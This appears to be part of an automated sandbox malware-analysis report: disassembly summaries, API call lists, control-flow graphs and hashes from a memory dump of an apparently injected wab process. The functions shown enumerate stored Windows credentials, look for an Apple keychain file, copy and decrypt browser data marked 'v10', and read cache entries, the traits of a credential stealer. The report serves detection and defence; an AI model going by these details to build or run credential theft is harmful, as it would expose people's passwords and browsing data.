                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 912665193-1740548384
                                                                                                                                                                                                                          • Opcode ID: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                          • String ID: BIN
                                                                                                                                                                                                                          • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                                                                            • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$memcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2420179184-0
                                                                                                                                                                                                                          • Opcode ID: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                                          • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 16 4455e5 5->16 17 4455e8-4455f9 5->17 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 19 445861-445874 call 40a889 call 403c9c 13->19 20 4458ac-4458b5 13->20 42 445823-445826 14->42 16->17 24 445672-445683 call 40a889 call 403fbe 17->24 25 4455fb-445601 17->25 50 445879-44587c 19->50 26 44594f-445958 20->26 27 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 20->27 84 445685 24->84 85 4456b2-4456b5 call 40b1ab 24->85 28 445605-445607 25->28 29 445603 25->29 35 4459f2-4459fa 26->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 26->36 135 44592d-445945 call 40b6ef 27->135 136 44594a 27->136 28->24 38 445609-44560d 28->38 29->28 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->24 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 39->3 40->39 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 73 445fae-445fb2 60->73 74 445d2b-445d3b 60->74 168 445cf5 61->168 169 445cfc-445d03 61->169 64->20 82 445884-44589d call 40a9b5 call 4087b3 65->82 138 445849 66->138 247 445c77 67->247 68->67 83 445ba2-445bcf call 4099c6 call 445403 call 445389 68->83 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->90 156 44589f 82->156 83->53 99 44568b-4456a4 call 40a9b5 call 4087b3 84->99 116 4456ba-4456c4 85->116 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 117 4457f9 116->117 118 4456ca-4456d3 call 413cfa call 413d4c 116->118 117->6 172 4456d8-4456f7 call 40b2cc call 413fa6 118->172 135->136 136->26 138->51 150->116 151->150 153->154 154->35 156->64 158->85 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->73 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                          • API String ID: 2745753283-3798722523
                                                                                                                                                                                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 393 40b6ef-40b741 call 44db70 memset call 409c70 wcsrchr 398 40b743 393->398 399 40b746-40b795 memset call 40b2cc call 409d1f call 409b98 393->399 398->399 406 40b7c5-40b815 call 40bb98 memset CreateFileW 399->406 407 40b797-40b7c2 call 409c70 call 40b2cc call 409d1f 399->407 413 40b837-40b838 FindCloseChangeNotification 406->413 414 40b817-40b835 call 409a45 CopyFileW 406->414 407->406 415 40b83e-40b87f memset call 40a6e6 call 444432 413->415 414->415 425 40bad5-40badc 415->425 426 40b885-40b8ac call 40b273 call 438552 415->426 428 40baeb-40baf7 call 40b04b 425->428 429 40bade-40bae5 DeleteFileW 425->429 435 40b8b2-40b8b8 call 4251c4 426->435 436 40bacd-40bad0 call 443d90 426->436 429->428 440 40babc-40bac0 435->440 436->425 441 40bac6-40bac8 call 424f26 440->441 442 40b8bd-40b9af memset call 425413 * 5 call 4253ef call 40b64c call 40a71b * 4 call 40a734 call 4253af call 4253cf 440->442 441->436 472 40ba92-40bab2 call 4099c6 call 4099f4 442->472 473 40b9b5-40b9c9 memcmp 442->473 483 40bab4-40baba call 4251c4 472->483 474 40bafa-40bb2a call 404423 473->474 475 40b9cf-40b9d7 473->475 474->472 482 40bb30-40bb3a 474->482 475->472 477 40b9dd-40ba25 call 447280 call 447960 475->477 477->472 492 40ba27-40ba7a call 40afe8 call 447920 call 4472c0 memcmp 477->492 486 40bb3c 482->486 487 40bb3e-40bb93 memset memcpy call 40a734 LocalFree 482->487 483->440 486->487 487->472 500 40ba7c-40ba8e call 40a734 492->500 501 40ba8f 492->501 500->501 501->472
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                          • String ID: chp$v10
                                                                                                                                                                                                                          • API String ID: 170802307-2783969131
                                                                                                                                                                                                                          • Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 505 40e2ab-40e2d5 call 40695d call 406b90 510 40e4a0-40e4af call 4069a3 505->510 511 40e2db-40e300 505->511 513 40e304-40e30f call 406e8f 511->513 516 40e314-40e316 513->516 517 40e476-40e483 call 406b53 516->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 516->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f ??3@YAXPAX@Z 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 556 40e3c3-40e3c6 551->556 552->553 554 40e416-40e427 memcpy 553->554 555 40e42a-40e42f 553->555 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                          • API String ID: 3073804840-2252543386
                                                                                                                                                                                                                          • Opcode ID: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
